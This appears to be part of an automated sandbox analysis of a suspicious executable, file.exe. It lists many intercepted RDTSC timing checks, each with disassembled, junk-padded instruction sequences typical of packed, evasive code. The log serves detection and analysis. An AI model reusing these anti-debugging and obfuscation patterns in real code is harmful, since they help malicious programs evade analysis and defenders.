Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A3F125 second address: A3F12B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F4D5 second address: A5F4EC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA9347D66B6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FA9347D66BBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F4EC second address: A5F50A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B332h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jns 00007FA934C8B326h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2A42D second address: A2A432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D38A second address: A5D390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D390 second address: A5D39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FA9347D66B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D39D second address: A5D3A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D651 second address: A5D657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D657 second address: A5D65B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D81E second address: A5D824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D824 second address: A5D828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D828 second address: A5D82C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D82C second address: A5D832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5D832 second address: A5D859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FA9347D66C6h 0x0000000f jmp 00007FA9347D66C0h 0x00000014 push esi 0x00000015 jnc 00007FA9347D66B6h 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5DC3E second address: A5DC49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E057 second address: A5E05D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E05D second address: A5E096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA934C8B330h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jmp 00007FA934C8B335h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 jg 00007FA934C8B326h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E096 second address: A5E09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E387 second address: A5E38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E38B second address: A5E3B9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FA9347D66B8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FA9347D66C7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E3B9 second address: A5E3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E3C3 second address: A5E3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E3CB second address: A5E3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 ja 00007FA934C8B326h 0x0000000c jmp 00007FA934C8B32Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E55D second address: A5E561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5E561 second address: A5E587 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA934C8B326h 0x00000008 jmp 00007FA934C8B339h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A56939 second address: A5693F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5693F second address: A56951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA934C8B32Dh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A56951 second address: A56959 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A56959 second address: A56980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B336h 0x00000007 jno 00007FA934C8B326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A56980 second address: A56984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A36011 second address: A3603C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA934C8B326h 0x0000000a pop eax 0x0000000b jmp 00007FA934C8B32Ch 0x00000010 pushad 0x00000011 jmp 00007FA934C8B32Bh 0x00000016 jng 00007FA934C8B326h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5EF5E second address: A5EF68 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F0C2 second address: A5F0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA934C8B334h 0x0000000c jnp 00007FA934C8B32Ch 0x00000012 jnc 00007FA934C8B326h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5F0E9 second address: A5F0EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A61300 second address: A61304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A32B02 second address: A32B07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6562C second address: A65630 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A65748 second address: A6574E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6574E second address: A65752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A647CB second address: A647D5 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69E5C second address: A69E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69E62 second address: A69E87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C8h 0x00000007 jns 00007FA9347D66B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69296 second address: A692BE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FA934C8B339h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A692BE second address: A692C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A692C5 second address: A692CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A692CD second address: A692D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A692D1 second address: A692E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FA934C8B326h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6942B second address: A69469 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C0h 0x00000007 jnc 00007FA9347D66B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FA9347D66D2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69469 second address: A6948C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B337h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jno 00007FA934C8B326h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69CDF second address: A69CE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BBBD second address: A6BBD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FA934C8B326h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BC4E second address: A6BC7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 29AFC4CFh 0x00000011 cmc 0x00000012 call 00007FA9347D66B9h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA9347D66BEh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BC7B second address: A6BC85 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BC85 second address: A6BC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BC8B second address: A6BCB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA934C8B333h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007FA934C8B32Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BCB5 second address: A6BCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BDA1 second address: A6BDA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6BDA7 second address: A6BDB5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C484 second address: A6C495 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA934C8B328h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C925 second address: A6C929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C929 second address: A6C937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA934C8B326h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6C937 second address: A6C989 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FA9347D66B8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D34C0h], ecx 0x0000002a mov dword ptr [ebp+122D19E1h], edx 0x00000030 nop 0x00000031 jmp 00007FA9347D66C3h 0x00000036 push eax 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6CCC1 second address: A6CCC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6EF36 second address: A6EF3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F988 second address: A6F98D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F98D second address: A6F9BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA9347D66B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f jns 00007FA9347D66B8h 0x00000015 pop ebx 0x00000016 nop 0x00000017 movzx edi, si 0x0000001a push 00000000h 0x0000001c or esi, 67CC658Ah 0x00000022 push 00000000h 0x00000024 mov di, si 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F71C second address: A6F720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F720 second address: A6F724 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6F724 second address: A6F750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007FA934C8B328h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jnp 00007FA934C8B333h 0x00000017 jmp 00007FA934C8B32Dh 0x0000001c push eax 0x0000001d push edx 0x0000001e jg 00007FA934C8B326h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A70F02 second address: A70F07 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A70F07 second address: A70F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007FA934C8B335h 0x0000000e jmp 00007FA934C8B32Fh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FA934C8B328h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e and esi, 38194BB8h 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007FA934C8B328h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000015h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 push esi 0x00000051 mov dword ptr [ebp+122D1844h], esi 0x00000057 pop esi 0x00000058 call 00007FA934C8B333h 0x0000005d mov dword ptr [ebp+124553FCh], eax 0x00000063 pop edi 0x00000064 push 00000000h 0x00000066 xchg eax, ebx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push edx 0x0000006c pop edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A70F94 second address: A70FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A70FA8 second address: A70FE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b ja 00007FA934C8B331h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA934C8B32Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A70FE0 second address: A70FE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7022C second address: A70231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A70231 second address: A7023B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA9347D66B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A70C9E second address: A70CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A75F50 second address: A75F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A77673 second address: A776F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FA934C8B328h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 pushad 0x00000022 or dx, 2AA6h 0x00000027 jnp 00007FA934C8B328h 0x0000002d popad 0x0000002e push 00000000h 0x00000030 sub dword ptr [ebp+122D2860h], eax 0x00000036 push 00000000h 0x00000038 and bh, FFFFFFB6h 0x0000003b xchg eax, esi 0x0000003c jmp 00007FA934C8B336h 0x00000041 push eax 0x00000042 je 00007FA934C8B349h 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FA934C8B337h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A71793 second address: A717B1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FA9347D66B8h 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007FA9347D66B6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A717B1 second address: A717B7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A717B7 second address: A717BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7A6C0 second address: A7A6CA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7D5FD second address: A7D601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A7D601 second address: A7D615 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Ah 0x00000007 jng 00007FA934C8B326h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A72B2D second address: A72B31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80B05 second address: A80B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA934C8B326h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80B0F second address: A80B35 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA9347D66C7h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A80B35 second address: A80B3A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A76839 second address: A76843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A81B72 second address: A81B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A81C06 second address: A81C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A81C0A second address: A81C14 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA934C8B326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A81C14 second address: A81C39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA9347D66B6h 0x00000009 jmp 00007FA9347D66BAh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 je 00007FA9347D66C4h 0x00000018 push eax 0x00000019 push edx 0x0000001a jp 00007FA9347D66B6h 0x00000020 rdtsc
